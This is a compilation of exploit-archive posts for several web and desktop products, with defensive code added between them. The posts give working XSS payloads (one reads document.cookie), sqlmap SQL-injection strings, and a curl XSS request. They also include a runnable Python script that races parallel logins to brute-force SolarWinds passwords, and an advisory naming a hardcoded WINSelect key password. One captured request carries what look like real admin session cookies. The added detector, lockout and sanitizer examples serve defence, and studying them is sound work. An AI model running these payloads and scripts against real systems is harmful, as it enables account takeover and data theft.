<pre><code># Exploit Title: Wordpress WPCode Lite Version 2.1.14 Stored XSS<br /># Date: 2024-06-30<br /># Exploit Author: tmrswrr<br /># Category : Webapps<br /># Vendor Homepage: https://wpcode.com/?utm_source=wprepo&utm_medium=link&utm_campaign=liteplugin<br /># Version 2.1.14<br /><br /><br />### Steps to Execute the Payload:<br /><br />1. **Access the Admin Panel:**<br /> - Navigate to the admin panel of your WordPress site.<br /> - Go to `Code Snippets > `Edit Snippet` via the following URL: <br /> ```<br /> https://127.0.0.1/wp-admin/admin.php?page=wpcode-snippet-manager&snippet_id=10<br /> ```<br /><br />2. **Insert the Payload:**<br /> - In the **Code Preview** section, insert the following payload:<br /> ```<br /> "><img src=x onerrora=confirm() onerror=confirm(document.cookie)><br /> ```<br /><br />3. **Save and Verify:**<br /> - Active , Save the changes.<br /> - Navigate to the main page of your site:<br /> ```<br /> https://127.0.0.1/<br /> ```<br /> - You should see the payload executed.<br /><br />Post Request :<br /><br />POST /wp-admin/admin.php?page=wpcode-snippet-manager&snippet_id=10 HTTP/2<br />Host: 127.0.0.1<br />Cookie: wordpress_sec_f8b0c342e0d48561e75d0c6818e29f16=admin%7C1720960057%7CA75X38uHvZeAN0Mrrbpj5brIJolGFEapEPEUcg7PyPe%7C37619eff632d24400e28a219976a87efa83c4bae1ebe04120e54cb37dbe30a03; wordpress_logged_in_f8b0c342e0d48561e75d0c6818e29f16=admin%7C1720960057%7CA75X38uHvZeAN0Mrrbpj5brIJolGFEapEPEUcg7PyPe%7C49992c3be16529995b5429fdd992a2dc1ff8cafa77c6f72580d9dbf9f3fe82ca; wp-settings-time-1=1719753966; WP-TSW-Session=5lursai747c2vcd5uno86liv2c; wp-settings-1=editor%3Dhtml<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Referer: https://127.0.0.1/wp-admin/admin.php?page=wpcode-snippet-manager&snippet_id=10<br 
/>Content-Type: application/x-www-form-urlencoded<br />Content-Length: 673<br />Origin: https://vagabondcreature.s3-tastewp.com<br />Dnt: 1<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br />Te: trailers<br /><br />wpcode_active=&button=publish&wpcode_snippet_title=Untitled+Snippet&wpcode_snippet_type=html&wpcode_snippet_code=%22%3E%3Cimg+src%3Dx+onerrora%3Dconfirm%28%29+onerror%3Dconfirm%28document.cookie%29%3E&wpcode_snippet_text=%3Cp%3E%22%26gt%3B%3Cimg+src%3D%22x%22+%2F%3E%3C%2Fp%3E&wpcode_auto_insert=1&wpcode_auto_insert_location_extra=&wpcode_auto_insert_number=1&wpcode_auto_insert_location=site_wide_header&wpcode-schedule-start=&wpcode-schedule-end=&wpcode_cl_rules=%5B%5D&wpcode_tags=&wpcode_priority=10&wpcode_note=&id=10&wpcode-save-snippet-nonce=73d127c1c2&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dwpcode-snippet-manager%26snippet_id%3D10%26message%3D1%26error<br /><br /><br /><br /></code></pre>
<pre><code># Exploit Title: xhibiter nft marketplace SQLI<br /># Google Dork: intitle:"View - Browse, create, buy, sell, and auction NFTs"<br /># Date: 29/06/204<br /># Exploit Author: Sohel yousef - https://www.linkedin.com/in/sohel-yousef-50a905189/<br /># Vendor Homepage: https://elements.envato.com/xhibiter-nft-marketplace-html-template-AQN45FA<br /># Version: 1.10.2<br /># Tested on: linux <br /># CVE : [if applicable]<br /><br />on this dir <br />https://localhost/collections?id=2<br />xhibiter nft marketplace suffers from SQLI <br /><br />---<br />Parameter: id (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: id=2' AND 4182=4182 AND 'rNfD'='rNfD<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: id=2' AND (SELECT 1492 FROM (SELECT(SLEEP(5)))HsLV) AND 'KEOa'='KEOa<br /><br /> Type: UNION query<br /> Title: MySQL UNION query (NULL) - 36 columns<br /> Payload: id=2' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162626271,0x655465754c50524d684f764944434458624e4e596c614b6d4a56656f495669466d4b704362666b58,0x71716a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#<br />---<br /></code></pre>
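Added example (not part of the advisory above, and not code from the xhibiter project): the three sqlmap techniques listed above leave distinctive traces in ordinary web server access logs, and a defender can flag them long before a UNION query returns data. The script parses constructed combined-format log lines, URL-decodes each query parameter and classifies the value as boolean-based, time-based or UNION-based. The regexes are assumptions written for this example, not a vendor signature set; the real fix for the application is a parameterized query for the `id` parameter.

```python
# Added example: flag SQL injection probes of the kinds shown in the advisory
# (boolean-based, time-based, UNION) in web server access logs. The log lines
# are constructed samples in combined log format; the patterns are assumptions.
import re
from urllib.parse import urlsplit, parse_qsl

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Ordered list so the output is deterministic; each entry is (name, pattern).
SQLI_PATTERNS = [
    # e.g. AND 4182=4182  or  AND 'rNfD'='rNfD  (tautology with a back-reference)
    ("boolean_based", re.compile(r"\b(and|or)\s+'?(\w+)'?\s*=\s*'?\2\b", re.I)),
    # e.g. SLEEP(5), BENCHMARK(...), pg_sleep(...), WAITFOR DELAY
    ("time_based", re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor\s+delay)\s*\(", re.I)),
    # e.g. UNION ALL SELECT NULL,NULL,...
    ("union_based", re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I)),
]

# Constructed sample log lines: one clean request, the three probe kinds, one clean request.
SAMPLE_LOG = """\
10.0.0.5 - - [29/Jun/2024:10:00:01 +0000] "GET /collections?id=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [29/Jun/2024:10:00:02 +0000] "GET /collections?id=2%27%20AND%204182%3D4182%20AND%20%27rNfD%27%3D%27rNfD HTTP/1.1" 200 5120 "-" "sqlmap/1.7"
10.0.0.5 - - [29/Jun/2024:10:00:09 +0000] "GET /collections?id=2%27%20AND%20%28SELECT%201492%20FROM%20%28SELECT%28SLEEP%285%29%29%29HsLV%29%20AND%20%27KEOa%27%3D%27KEOa HTTP/1.1" 200 5120 "-" "sqlmap/1.7"
10.0.0.5 - - [29/Jun/2024:10:00:10 +0000] "GET /collections?id=2%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x7162626271%2C0x41%29%2CNULL%23 HTTP/1.1" 200 9000 "-" "sqlmap/1.7"
10.0.0.7 - - [29/Jun/2024:10:01:00 +0000] "GET /collections?id=3&sort=name HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""


def classify_value(value):
    """Return the names of the injection techniques matched by one decoded parameter value."""
    return [name for name, pattern in SQLI_PATTERNS if pattern.search(value)]


def scan_access_log(text):
    """Return one finding per flagged (request, parameter) pair, in log order."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        parts = urlsplit(m.group("target"))
        # parse_qsl URL-decodes the values, so the patterns see the raw SQL.
        for param, value in parse_qsl(parts.query, keep_blank_values=True):
            techniques = classify_value(value)
            if techniques:
                hits.append({"ip": m.group("ip"), "path": parts.path, "param": param,
                             "value": value, "techniques": techniques})
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(f'{hit["ip"]} {hit["path"]} param={hit["param"]} {",".join(hit["techniques"])}')
```

The time-based probe is also caught by the boolean pattern, because sqlmap appends the same tautology (`AND 'KEOa'='KEOa`) to keep the query syntactically valid; seeing both labels on one request is a strong indicator of automated tooling rather than a stray quote in user input.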
<pre><code># Exploit Title: Customer Support System 1.0 - (XSS) Cross-Site Scripting Vulnerability in the "subject" at "ticket_list"<br /># Date: 28/11/2023<br /># Exploit Author: Geraldo Alcantara<br /># Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html<br /># Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code<br /># Version: 1.0<br /># Tested on: Windows<br /># CVE : CVE-2023-49976<br />*Steps to reproduce:*<br />1- Log in to the application.<br />2- Visit the ticket creation/editing page.<br />3- Create/Edit a ticket and insert the malicious payload into the<br />"subject" field/parameter.<br />Payload: <dt/><b/><script>alert(document.domain)</script><br /></code></pre>
<pre><code># Exploit Title: SimpCMS v0.1 - Cross Site Scripting (XSS)<br /># Date: 26-06-2024<br /># CVE: CVE-2024-39248<br /># Exploit Author: Jason Jacobs (0xjason_jacobs)<br /># Vendor Homepage: https://sourceforge.net/projects/simpcms/<br /># Software Link: https://sourceforge.net/projects/simpcms/<br /><br /># Category: Web Application<br /># Version: 0.1<br /># Vulnerable endpoint: /SimpCMS/admin.php<br /><br />Upon logging in to the admin interface for SimpCMS, copy your respective Cookie values observed in the Application tab in the browser Inspect element and submit the following curl request:<br /><br />curl -X POST "http://site.com/SimpCMS/admin.php" -d "title=%3Cbody+onload%3Dalert%281%29%3E&text=ee&cat=something&main=1&submit=submit" -b "username=admin; password=PARAMVALUE"<br /><br />Explanation:<br />- curl: The command-line tool for transferring data with URLs.<br />- -X POST: Specifies the request method to use (POST).<br />- "http://site.com/SimpCMS/admin.php": The URL to which the request is sent.<br />- -d "title=%3Cbody+onload%3Dalert%281%29%3E&text=ee&cat=something&main=1&submit=submit": The POST request payload.<br /><br />Run this command in your terminal to send the POST request with the XSS payload.<br />Visit the /SimpCMS main site and the XSS will be visible.<br /></code></pre>
<pre><code># Exploit Title: SolarWinds Platform 2024.1 SR1 - Race Condition<br /># CVE: CVE-2024-28999<br /># Affected Versions: SolarWinds Platform 2024.1 SR 1 and previous versions<br /># Author: Elhussain Fathy, AKA 0xSphinx<br /><br />import requests<br />import urllib3<br />import asyncio<br />import aiohttp<br />urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)<br />http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED')<br /><br /># host = '192.168.1.1'<br /># username = "admin"<br /># file_path = "passwords.txt"<br /><br />host = input("Enter the host: ")<br />username = input("Enter the username: ")<br />file_path = input("Enter the passwords file path: ")<br />exploited = 0<br /><br />url = f"https://{host}:443/Orion/Login.aspx?ReturnUrl=%2F"<br /><br />passwords = []<br />with open(file_path, 'r') as file:<br />    for line in file:<br />        word = line.strip()<br />        passwords.append(word)<br />print(f"Number of tested passwords: {len(passwords)}")<br /><br /><br />headers = {<br />    'Host': host,<br />}<br /><br />sessions = []<br /><br />for _ in range(len(passwords)):<br />    response = requests.get(url, headers=headers, verify=False, stream=False)<br />    cookies = response.headers.get('Set-Cookie', '')<br />    session_id = cookies.split('ASP.NET_SessionId=')[1].split(';')[0]<br />    sessions.append(session_id)<br /><br /><br />async def send_request(session, username, password):<br />    headers = {<br />        'Host': host,<br />        'Content-Type': 'application/x-www-form-urlencoded',<br />        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',<br />        'Cookie': f'ASP.NET_SessionId={session}; TestCookieSupport=Supported; Orion_IsSessionExp=TRUE',<br />    }<br /><br />    data = f'__EVENTTARGET=ctl00%24BodyContent%24LoginButton&__EVENTARGUMENT=&__VIEWSTATE=AEQKNijmHeR5jZhMrrXSjzPRqhTz%2BoTqkfNmc3EcMLtc%2FIjqS37FtvDMFn83yUTgHBJIlMRHwO0UVUVzwcg2cO%2B%2Fo2CEYGVzjB1Ume1UkrvCOFyR08HjFGUJOR4q9GX0fmhVTsvXxy7A2hH64m5FBZTL9dfXDZnQ1gUvFp%2BleWgLTRssEtTuAqQQxOLA3nQ6n9Yx%2FL4QDSnEfB3b%2FlSWw8Xruui0YR5kuN%2BjoOH%2BEC%2B4wfZ1%2BCwYOs%2BLmIMjrK9TDFNcWTUg6HHiAn%2By%2B5wWpsj7qiJG3%2F1uhWb8fFc8Mik%3D&__VIEWSTATEGENERATOR=01070692&ctl00%24BodyContent%24Username={username}&ctl00%24BodyContent%24Password={password}'<br /><br />    async with aiohttp.ClientSession() as session:<br />        async with session.post(url, headers=headers, data=data, ssl=False, allow_redirects=False) as response:<br />            if response.status == 302:<br />                global exploited<br />                exploited = 1<br />                print(f"Exploited Successfully Username: {username}, Password: {password}")<br /><br /><br />async def main():<br />    tasks = []<br />    for i in range(len(passwords)):<br />        session = sessions[i]<br />        password = passwords[i]<br />        task = asyncio.create_task(send_request(session, username, password))<br />        tasks.append(task)<br />    await asyncio.gather(*tasks)<br /><br />asyncio.run(main())<br /><br />if not exploited:<br />    print("Exploitation Failed")<br /></code></pre>
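Added example, not part of the advisory and not touching SolarWinds: the script above obtains one fresh server session per password and then fires every login attempt at the same moment. That only works when the lockout counter is kept per session, or when its check and increment are not atomic, so that concurrent attempts each see a counter that has not yet been raised. The simulation below runs the same attempt pattern against a per-session counter and against a per-account counter whose check-and-increment is done under a lock. The attempt limit, the credential and the session names are constructed assumptions.

```python
# Added example (not the vendor's code): a login lockout tracked per session
# versus one tracked per account with an atomic check-and-increment, driven by
# the same "one session per guess, all at once" pattern as the PoC above.
import threading
from concurrent.futures import ThreadPoolExecutor

MAX_ATTEMPTS = 3  # assumed lockout threshold


def verify_constructed(username, password):
    """Stand-in for the real credential check (constructed test credential)."""
    return username == "admin" and password == "correct-horse-battery"


class PerSessionLockout:
    """Vulnerable: the counter lives in the session, so N sessions give N budgets."""

    def __init__(self):
        self.counts = {}

    def try_login(self, session_id, username, password, verify=verify_constructed):
        n = self.counts.get(session_id, 0)
        if n >= MAX_ATTEMPTS:
            return "locked"
        self.counts[session_id] = n + 1
        return "ok" if verify(username, password) else "bad"


class PerAccountLockout:
    """Hardened: one counter per account; check and increment happen atomically."""

    def __init__(self):
        self.counts = {}
        self.lock = threading.Lock()

    def try_login(self, session_id, username, password, verify=verify_constructed):
        key = username.lower()
        with self.lock:  # in production: an atomic INCR in a store shared by all nodes
            n = self.counts.get(key, 0)
            if n >= MAX_ATTEMPTS:
                return "locked"
            self.counts[key] = n + 1
        return "ok" if verify(username, password) else "bad"


def concurrent_attempts(policy, passwords, username="admin"):
    """Fire every guess at once, each from its own session, like the PoC does."""
    with ThreadPoolExecutor(max_workers=len(passwords)) as pool:
        futures = [pool.submit(policy.try_login, f"session-{i}", username, pw)
                   for i, pw in enumerate(passwords)]
        return [f.result() for f in futures]


def attempts_evaluated(results):
    """How many guesses actually reached the credential check."""
    return sum(r != "locked" for r in results)


if __name__ == "__main__":
    guesses = [f"guess-{i}" for i in range(9)] + ["correct-horse-battery"]
    for policy in (PerSessionLockout(), PerAccountLockout()):
        results = concurrent_attempts(policy, guesses)
        print(f"{type(policy).__name__}: {attempts_evaluated(results)} of {len(guesses)} guesses evaluated")
```

With the per-session policy all ten guesses are evaluated and the correct one is found; with the per-account policy exactly three reach the credential check regardless of how many sessions or threads are used. A production version would reset the counter on success and expire it after a window, but the invariant that matters here is that the counter is keyed by the account and updated atomically.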
<pre><code># Exploit Title: Automad 2.0.0-alpha.4 - Stored Cross-Site Scripting (XSS)<br /># Date: 20-06-2024<br /># Exploit Author: Jerry Thomas (w3bn00b3r)<br /># Vendor Homepage: https://automad.org<br /># Software Link: https://github.com/marcantondahmen/automad<br /># Category: Web Application [Flat File CMS]<br /># Version: 2.0.0-alpha.4<br /># Tested on: Docker version 26.1.4, build 5650f9b | Debian GNU/Linux 11<br />(bullseye)<br /><br /># Description<br /><br />A persistent (stored) cross-site scripting (XSS) vulnerability has been<br />identified in Automad 2.0.0-alpha.4. This vulnerability enables an attacker<br />to inject malicious JavaScript code into the template body. The injected<br />code is stored within the flat file CMS and is executed in the browser of<br />any user visiting the forum. This can result in session hijacking, data<br />theft, and other malicious activities.<br /><br /># Proof-of-Concept<br /><br />*Step-1:* Login as Admin & Navigate to the endpoint<br />http://localhost/dashboard/home<br /><br />*Step-2:* There will be a default Welcome page. 
You will find an option to<br />edit it.<br /><br />*Step-3:* Navigate to Content tab or<br />http://localhost/dashboard/page?url=%2F&section=text & edit the block named<br />***`Main`***<br /><br />*Step-4:* Enter the XSS Payload - <img src=x onerror=alert(1)><br /><br /><br />*Request:*<br /><br />POST /_api/page/data HTTP/1.1<br /><br />Host: localhost<br />Content-Length: 1822<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36<br />(KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36<br />Content-Type: multipart/form-data;<br />boundary=----WebKitFormBoundaryzHmXQBdtZsTYQYCv<br />Accept: */*<br />Origin: http://localhost<br />Referer: http://localhost/dashboard/page?url=%2F&section=text<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie:<br />Automad-8c069df52082beee3c95ca17836fb8e2=d6ef49301b4eb159fbcb392e5137f6cb<br />Connection: close<br /><br />------WebKitFormBoundaryzHmXQBdtZsTYQYCv<br />Content-Disposition: form-data; name="__csrf__"<br /><br />49d68bc08cca715368404d03c6f45257b3c0514c7cdf695b3e23b0a4476a4ac1<br />------WebKitFormBoundaryzHmXQBdtZsTYQYCv<br />Content-Disposition: form-data; name="__json__"<br /><br />{"data":{"title":"Welcome","+hero":{"blocks":[{"id":"KodzL-KvSZcRyOjlQDYW9Md2rGNtOUph","type":"paragraph","data":{"text":"Testing<br />for<br />xss","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"bO_fxLKL1LLlgtKCSV_wp2sJQkXAsda8","type":"paragraph","data":{"text":"<h1>XSS<br />identified by<br />Jerry</h1>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"},"+main":{"blocks":[{"id":"lD9sUJki6gn463oRwjcY_ICq5oQPYZVP","type":"paragraph","data":{"text":"You<br />have successfully installed Automad 2.<br><br><img src=x<br 
/>onerror=alert(1)><br>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"NR_n3XqFF94kfN0jka5XGbi_-TBEf9ot","type":"buttons","data":{"primaryText":"Visit<br />Dashboard","primaryLink":"/dashboard","primaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingVertical":"0.5rem","paddingHorizontal":"1.5rem"},"primaryOpenInNewTab":false,"secondaryText":"","secondaryLink":"","secondaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingHorizontal":"1.5rem","paddingVertical":"0.5rem"},"secondaryOpenInNewTab":true,"justify":"start","gap":"1rem"},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"}},"theme_template":"project","dataFetchTime":"1718911139","url":"/"}<br />------WebKitFormBoundaryzHmXQBdtZsTYQYCv--<br /><br /><br />*Response:*<br /><br />HTTP/1.1 200 OK<br /><br />Server: nginx/1.24.0<br />Date: Thu, 20 Jun 2024 19:17:35 GMT<br />Content-Type: application/json; charset=utf-8<br />Connection: close<br />X-Powered-By: PHP/8.3.6<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Content-Length: 30`<br /><br />{"code":200,"time":1718911055}<br /><br /><br />*Step-5:* XSS triggers when you go to homepage - http://localhost/<br /><br /><br /></code></pre>
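The three stored XSS reports above (Customer Support System "subject", SimpCMS "title", and the Automad block editor) share one root cause: user-controlled markup is stored and later rendered without being reduced to a safe subset. Where a field is plain text, HTML-escaping it on output is enough; where the application intentionally stores rich text, as Automad's block editor does, an allow-list sanitizer is needed. The sanitizer below is an added example written for this page, not code from any of the three projects; the tag and attribute allow-list is an assumption, and a real deployment would tune it. It keeps only known-safe tags and attributes, which implicitly drops every `on*` handler, removes `<script>`/`<style>` together with their content, and rejects `javascript:` and `data:` URLs.

```python
# Added example: allow-list HTML sanitizer for stored rich text, built on the
# standard-library parser. Not code from Automad, SimpCMS or the Customer
# Support System; the allow-lists below are assumptions for this example.
import html
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

ALLOWED_TAGS = {"p", "br", "b", "i", "strong", "em", "h1", "h2", "h3", "ul", "ol", "li", "a", "img"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = {"", "http", "https", "mailto"}   # "" = relative URL
VOID_TAGS = {"br", "img"}
DROP_CONTENT_TAGS = {"script", "style"}
CONTROL_CHARS = re.compile(r"[\x00-\x20\x7f]")   # browsers strip these inside URLs


class AllowlistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open = []        # allowed, non-void tags still open
        self.skip_depth = 0   # > 0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT_TAGS:
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return  # unknown tags (body, dt, svg, ...) are dropped; their text is kept
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, ()):
                continue  # drops every on* handler, style=, etc.
            value = (value or "").strip()
            if name in URL_ATTRS:
                value = CONTROL_CHARS.sub("", value)   # "java\nscript:" must not slip through
                if urlsplit(value).scheme.lower() not in SAFE_SCHEMES:
                    continue  # drops javascript:, data:, vbscript: URLs
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.open.append(tag)

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)
        if tag not in VOID_TAGS:
            self.handle_endtag(tag)

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT_TAGS:
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in self.open:
            return
        while self.open:  # close anything still nested inside, then the tag itself
            closed = self.open.pop()
            self.out.append(f"</{closed}>")
            if closed == tag:
                break

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(html.escape(data, quote=False))

    def result(self):
        self.close()
        while self.open:  # balance whatever the input left open
            self.out.append(f"</{self.open.pop()}>")
        return "".join(self.out)


def sanitize_html(fragment):
    """Reduce an untrusted HTML fragment to the allow-listed subset, re-serialized."""
    s = AllowlistSanitizer()
    s.feed(fragment)
    return s.result()
```

Run against the three payloads on this page, `<img src=x onerror=alert(1)>` becomes `<img src="x">`, `<dt/><b/><script>alert(document.domain)</script>` becomes `<b></b>`, and `<body onload=alert(1)>` disappears entirely. Re-serializing from the parsed tree, rather than deleting substrings from the original, is what makes the output predictable: the browser sees only markup the sanitizer itself emitted.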
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20240624-0 ><br />=======================================================================<br /> title: Multiple Vulnerabilities allowing complete bypass<br /> product: Faronics WINSelect (Standard + Enterprise)<br /> vulnerable version: <8.30.xx.903<br /> fixed version: 8.30.xx.903<br /> CVE number: CVE-2024-36495, CVE-2024-36496, CVE-2024-36497<br /> impact: high<br /> homepage: https://www.faronics.com/products/winselect<br /> found: 2024-02-01<br /> by: Daniel Hirschberger (Office Bochum)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Eviden business<br /> Europe | Asia<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"WINSelect - Allows you to easily control your end-users' Windows Experience without<br />having to deal with GPOs.<br />Need to Prevent Data From Leaving?<br />Whether you're working on classified government files or the secret ingredient<br />for your famous lasagna, you need to protect your sensitive information from<br />walking out the door.<br /><br />Faronics WINSelect offers the ability to disable USB ports and disk drives. 
Now<br />you can relax knowing your secrets won't be exported without your knowledge."<br /><br />Source: https://www.faronics.com/products/winselect<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides a patched version which should be installed immediately.<br /><br />SEC Consult highly recommends to perform a thorough security review of the<br />product conducted by security professionals to identify and resolve potential<br />further security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Read/Write Permissions for Everyone on Configuration File (CVE-2024-36495)<br />The application saves its configuration in an encrypted file which "Everyone" has<br />read and write access to.<br /><br /><br />2) Hardcoded Credentials (CVE-2024-36496)<br />The configuration file is encrypted with a static key derived from a static five-<br />character password which allows an attacker to decrypt this file.<br /><br /><br />3) Unhashed Storage of Password (CVE-2024-36497)<br />The decrypted configuration file contains the password in cleartext which is used<br />to configure WINSelect. 
It can be used to remove the existing restrictions and<br />disable WINSelect entirely.<br /><br />By combining these issues any local attacker can disable WINSelect.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Read/Write Permissions for Everyone on Configuration File (CVE-2024-36495)<br /><br />WINSelect Standard saves its configuration in the following file:<br />C:\ProgramData\WINSelect\WINSelect.wsd<br /><br /><br />Every user has read and write permissions on this file by default:<br /><read_write_everyone.png><br /><br />The write permission is no problem as long as WINSelect is running, because it<br />is locked by the process WSEngine.exe.<br /><br />For WINSelect Enterprise the path for the configuration file is:<br />C:\ProgramData\Faronics\StorageSpace\WS\WINSelect.wsd<br /><br /><br />2) Hardcoded Credentials (CVE-2024-36496)<br />By analyzing the application via the API Monitor tool, we found that the<br />application uses a hardcoded five letter password, hashes it with the outdated<br />and broken MD5 algorithm (no salt) and uses the first five bytes as the key<br />for RC4. 
The configuration file is then encrypted with these parameters.<br /><br />After starting WINSelect.exe the MD5 and RC4 algorithms are requested:<br /><rc4_md5.png><br /><br />When the login to the configuration of WINSelect is triggered via<br />CTRL+ALT+SHIFT+F8, the configuration file is decrypted.<br /><login.png><br /><br />The hardcoded password "Kunal" is hashed.<br /><hash_input.png><br /><hash_output.png><br /><br />The first five bytes of the hash are used to instantiate a key object.<br /><key.png><br /><br />The configuration is then decrypted with this key.<br /><decrypted.jpeg><br /><br />To simplify this proof of concept the following python script was developed<br />which automatically decrypts an encrypted WINSelect.wsd:<br /><test.py><br /><br /><br />3) Unhashed Storage of Password (CVE-2024-36497)<br />By decrypting the configuration file, the used password can be extracted at the<br />beginning of the file:<br /><br />---<br /><?xml version="1.0"?><br /><KIOSK><br /> <SECTIONS><br /> <SECTION><br /> <SID>194</SID><!--S_ID_ADMIN_PASS--><br /> <RULES><br /> <RULE><br /> <ID>121</ID><!--R_ID_PROTECTION_ON_OFF--><br /> <ENABLED>1</ENABLED><br /> </RULE><br /> <RULE><br /> <ID>148</ID><!--R_ID_PROTECTION_ON_OFF_ADMIN--><br /> <ENABLED>1</ENABLED><br /> </RULE><br /> <RULE><br /> <ID>116</ID><!--R_ID_ADMIN_PASS--><br /> <ENABLED>1</ENABLED><br /> <DATA><br /> <PASSWORDSET>0</PASSWORDSET><br /> <ADMINPASSWORD>myadminpw</ADMINPASSWORD><br /> </DATA><br />---<br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following version has been tested which was the latest version available<br />at the time of the test:<br />* 8.22.1112.886<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2024-02-19: Contacting vendor through support@faronics.com and<br /> customerservice@faronics.com<br />2024-02-20: Vendor responds with an email address to which we shall send the<br /> advisory.<br />2024-02-20: 
Asking for encryption, vendor requests unencrypted communication,<br /> submitting advisory.<br />2024-02-21: Vendor confirms receipt, engaged with product and development teams.<br />2024-02-27: Vendor introduces additional contact, will coordinate further responses.<br />2024-03-13: Additional contact apologizes for delayed response, vulnerabilities<br /> already discussed internally. Asks for extension of release.<br />2024-03-14: Extending advisory release to coordinate with patch.<br />2024-04-10: Vendor has addressed the reported issues in a test build for the<br /> standard version, enterprise fixes will be incorporated soon.<br />2024-04-18: Giving feedback that the issue is still exploitable, proposing a<br /> better hash function and random UUID, linking to OWASP password storage<br /> cheat sheet.<br />2024-04-21: Vendor thanks us for the proposed fix, current patch must be released, but<br /> working on new version incorporating our feedback.<br />2024-04-23: Providing further feedback, especially regarding GPU attacks.<br />2024-05-27: Asking for a status update.<br />2024-05-29: Vendor's last email got stuck in their mailbox. The latest WINSelect patch<br /> was released in early May, now incorporates PBKDF2. 
Provides release notes<br /> and download URL.<br /> Reserving CVE numbers.<br />2024-06-10: We can confirm that the PBKDF2 is used with SHA256 and 600000 iterations<br />2024-06-11: Since the hardcoded password for the encryption is not fixed, we ask if<br /> this will be addressed as well.<br /> Vendor responds that this will be addressed in a future release.<br />2024-06-24: Coordinated release of security advisory.<br /><br /><br />Solution:<br />---------<br />The vendor provides a patched version 8.30.xx.903 since May 2024 which can be downloaded<br />from the following URL:<br />https://www.faronics.com/document-library/document/download-winselect-standard<br /><br />The vendor provided the following changelog:<br />https://www.faronics.com/en-uk/document-library/document/winselect-standard-release-notes<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br />An integrated part of SEC Consult, an Eviden business<br />Europe | Asia<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC 